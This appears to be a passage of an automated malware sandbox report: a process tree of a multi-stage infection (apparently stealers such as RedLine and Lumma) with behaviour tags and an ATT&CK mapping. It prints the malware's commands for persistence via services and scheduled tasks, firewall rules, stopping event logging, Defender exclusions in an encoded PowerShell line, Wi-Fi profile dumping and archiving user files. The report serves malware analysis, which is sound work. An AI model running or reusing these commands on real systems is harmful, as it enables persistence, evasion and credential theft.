- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\1000506001\35881367040156107868ae3b7424f39d.exe
"C:\Users\Admin\AppData\Local\Temp\1000506001\35881367040156107868ae3b7424f39d.exe"
3⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:1288

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:1088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:4932

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
4⤵
PID:3128

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4080

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
5⤵
PID:2948

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:6064

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:5192

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4672

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
5⤵
PID:1168

C:\Users\Admin\AppData\Local\Temp\1000510001\Hjomvzwsu.exe
"C:\Users\Admin\AppData\Local\Temp\1000510001\Hjomvzwsu.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Users\Admin\AppData\Local\Temp\1000514001\35881367040156107868ae3b7424f39d.exe
"C:\Users\Admin\AppData\Local\Temp\1000514001\35881367040156107868ae3b7424f39d.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Users\Admin\AppData\Local\Temp\1000514001\35881367040156107868ae3b7424f39d.exe
"C:\Users\Admin\AppData\Local\Temp\1000514001\35881367040156107868ae3b7424f39d.exe"
3⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:4296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:1452

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4908

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4120

C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:4564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\803511929133_Desktop.zip' -CompressionLevel Optimal
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Users\Admin\AppData\Local\Temp\1000523001\redline1234min.exe
"C:\Users\Admin\AppData\Local\Temp\1000523001\redline1234min.exe"
2⤵
PID:1896

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "FLWCUERA"
3⤵
- Launches sc.exe
PID:3088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000523001\redline1234min.exe"
3⤵
PID:4564

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:4076

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "FLWCUERA"
3⤵
- Launches sc.exe
PID:3848

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:4552

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
3⤵
- Launches sc.exe
PID:1276

C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe
"C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe"
2⤵
PID:4772

\??\c:\users\admin\appdata\local\temp\1000524001\well.exe
c:\users\admin\appdata\local\temp\1000524001\well.exe
3⤵
PID:1396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=584 --field-trial-handle=1924,i,6776968866533280323,934660654007000249,131072 /prefetch:2
5⤵
PID:3564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1924,i,6776968866533280323,934660654007000249,131072 /prefetch:1
5⤵
PID:3836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1924,i,6776968866533280323,934660654007000249,131072 /prefetch:1
5⤵
PID:4424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2108 --field-trial-handle=1924,i,6776968866533280323,934660654007000249,131072 /prefetch:8
5⤵
PID:2900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1924,i,6776968866533280323,934660654007000249,131072 /prefetch:8
5⤵
PID:4060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff905d9758,0x7fff905d9768,0x7fff905d9778
5⤵
PID:2500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4552 --field-trial-handle=1924,i,6776968866533280323,934660654007000249,131072 /prefetch:1
5⤵
PID:5476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4740 --field-trial-handle=1924,i,6776968866533280323,934660654007000249,131072 /prefetch:8
5⤵
PID:5644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3744 --field-trial-handle=1924,i,6776968866533280323,934660654007000249,131072 /prefetch:8
5⤵
PID:5636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5108 --field-trial-handle=1924,i,6776968866533280323,934660654007000249,131072 /prefetch:8
5⤵
PID:5420

C:\Users\Admin\AppData\Local\icsys.icn.exe
C:\Users\Admin\AppData\Local\icsys.icn.exe
3⤵
PID:4056

\??\c:\windows\system\explorer.exe
c:\windows\system\explorer.exe
4⤵
PID:3532

\??\c:\windows\system\spoolsv.exe
c:\windows\system\spoolsv.exe SE
5⤵
PID:4776

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
6⤵
PID:1836

\??\c:\windows\system\spoolsv.exe
c:\windows\system\spoolsv.exe PR
7⤵
PID:952

C:\Windows\SysWOW64\at.exe
at 16:32 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
7⤵
PID:5056

C:\Windows\SysWOW64\at.exe
at 16:33 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
7⤵
PID:400

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
2⤵
PID:4644

C:\Users\Admin\AppData\Local\Temp\1000525001\dota.exe
"C:\Users\Admin\AppData\Local\Temp\1000525001\dota.exe"
2⤵
PID:5340

\??\c:\users\admin\appdata\local\temp\1000525001\dota.exe
c:\users\admin\appdata\local\temp\1000525001\dota.exe
3⤵
PID:5796

C:\Users\Admin\AppData\Local\icsys.icn.exe
C:\Users\Admin\AppData\Local\icsys.icn.exe
3⤵
PID:5196

\??\c:\windows\system\explorer.exe
c:\windows\system\explorer.exe
4⤵
PID:5984

C:\Users\Admin\AppData\Local\Temp\1000526001\ladas.exe
"C:\Users\Admin\AppData\Local\Temp\1000526001\ladas.exe"
2⤵
PID:5908

\??\c:\users\admin\appdata\local\temp\1000526001\ladas.exe
c:\users\admin\appdata\local\temp\1000526001\ladas.exe
3⤵
PID:6032

C:\Users\Admin\AppData\Local\icsys.icn.exe
C:\Users\Admin\AppData\Local\icsys.icn.exe
3⤵
PID:6056

\??\c:\windows\system\explorer.exe
c:\windows\system\explorer.exe
4⤵
PID:5204

C:\Users\Admin\AppData\Local\Temp\1000527001\InstallSetup3.exe
"C:\Users\Admin\AppData\Local\Temp\1000527001\InstallSetup3.exe"
2⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
3⤵
PID:5580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
4⤵
PID:5312

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:6024

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
5⤵
- Creates scheduled task(s)
PID:5484

C:\Users\Admin\AppData\Local\Temp\nsr6E67.tmp
C:\Users\Admin\AppData\Local\Temp\nsr6E67.tmp
3⤵
PID:5492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 2380
4⤵
- Program crash
PID:1180

C:\Users\Admin\AppData\Local\Temp\1000528001\35881367040156107868ae3b7424f39d.exe
"C:\Users\Admin\AppData\Local\Temp\1000528001\35881367040156107868ae3b7424f39d.exe"
2⤵
PID:5840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
PID:5660

C:\Users\Admin\AppData\Local\Temp\1000528001\35881367040156107868ae3b7424f39d.exe
"C:\Users\Admin\AppData\Local\Temp\1000528001\35881367040156107868ae3b7424f39d.exe"
3⤵
PID:5768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:1388

C:\Users\Admin\AppData\Local\Temp\1000529001\daisy123.exe
"C:\Users\Admin\AppData\Local\Temp\1000529001\daisy123.exe"
2⤵
PID:5744

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5500

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5180

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
4⤵
PID:2012

C:\Users\Admin\AppData\Local\Temp\1000530001\lolololoMRK123.exe
"C:\Users\Admin\AppData\Local\Temp\1000530001\lolololoMRK123.exe"
2⤵
PID:1704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 1256
4⤵
- Program crash
PID:5228

C:\Users\Admin\AppData\Local\Temp\1000531001\kiliqiuang.exe
"C:\Users\Admin\AppData\Local\Temp\1000531001\kiliqiuang.exe"
2⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\1000531001\kiliqiuang.exe
"C:\Users\Admin\AppData\Local\Temp\1000531001\kiliqiuang.exe"
3⤵
PID:1388

C:\Users\Admin\AppData\Local\Temp\1000532001\phonesteal.exe
"C:\Users\Admin\AppData\Local\Temp\1000532001\phonesteal.exe"
2⤵
PID:2144

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "THYAWYFT"
3⤵
- Launches sc.exe
PID:5884

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "THYAWYFT" binpath= "C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe" start= "auto"
3⤵
- Launches sc.exe
PID:3300

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "THYAWYFT"
3⤵
- Launches sc.exe
PID:3980

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:4500

C:\Users\Admin\AppData\Local\Temp\1000533001\alexlll.exe
"C:\Users\Admin\AppData\Local\Temp\1000533001\alexlll.exe"
2⤵
PID:2156

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5728

C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"
4⤵
PID:4508

C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe"
4⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
4⤵
PID:5512

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:3464

C:\Users\Admin\AppData\Local\Temp\1000534001\goldprimeqw3312321.exe
"C:\Users\Admin\AppData\Local\Temp\1000534001\goldprimeqw3312321.exe"
2⤵
PID:3660

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4408

C:\Users\Admin\AppData\Local\Temp\1000535001\National.exe
"C:\Users\Admin\AppData\Local\Temp\1000535001\National.exe"
2⤵
PID:5764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
3⤵
PID:5668

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
3⤵
PID:516

C:\Users\Admin\AppData\Local\Temp\1000536001\lumma123142124.exe
"C:\Users\Admin\AppData\Local\Temp\1000536001\lumma123142124.exe"
2⤵
PID:2248

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 1236
4⤵
- Program crash
PID:1576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 1204
4⤵
- Program crash
PID:5992

C:\Users\Admin\AppData\Local\Temp\1000537001\father1.exe
"C:\Users\Admin\AppData\Local\Temp\1000537001\father1.exe"
2⤵
PID:5040

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:216

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5852

C:\Users\Admin\AppData\Local\Temp\1000538001\1800.exe
"C:\Users\Admin\AppData\Local\Temp\1000538001\1800.exe"
2⤵
PID:1976

C:\ProgramData\viewer\viewer.exe
"C:\ProgramData\viewer\viewer.exe"
3⤵
PID:5832

\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
4⤵
PID:4108

C:\Users\Admin\AppData\Local\Temp\1000539001\Hjomvzwsu.exe
"C:\Users\Admin\AppData\Local\Temp\1000539001\Hjomvzwsu.exe"
2⤵
PID:64

C:\Users\Admin\AppData\Local\Temp\1000540001\987123.exe
"C:\Users\Admin\AppData\Local\Temp\1000540001\987123.exe"
2⤵
PID:1256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 348
3⤵
- Program crash
PID:2444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAUgBlAHMAbwB1AHIAYwBlAFMAZQB0AFQAeQBwAGUAXABLAGUAeQBzAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABSAGUAcwBvAHUAcgBjAGUAUwBlAHQAVAB5AHAAZQBcAEsAZQB5AHMALgBlAHgAZQA=
1⤵
PID:4132

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:2188

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
1⤵
PID:4196

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:4956

C:\Windows\system32\conhost.exe
conhost.exe
2⤵
PID:3740

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of WriteProcessMemory
PID:4296

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5132

C:\Users\Admin\AppData\Roaming\ResourceSetType\Keys.exe
C:\Users\Admin\AppData\Roaming\ResourceSetType\Keys.exe
1⤵
PID:2800

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
2⤵
PID:5692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5368 -ip 5368
1⤵
PID:1584

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:3704

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
- Launches sc.exe
PID:2236

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5492 -ip 5492
1⤵
PID:3592

C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe
C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe
1⤵
PID:5028

C:\Windows\explorer.exe
explorer.exe
2⤵
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2908 -ip 2908
1⤵
PID:5124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2908 -ip 2908
1⤵
PID:4252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1256 -ip 1256
1⤵
PID:5732

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Virtualization/Sandbox Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

Virtualization/Sandbox Evasion

System Information Discovery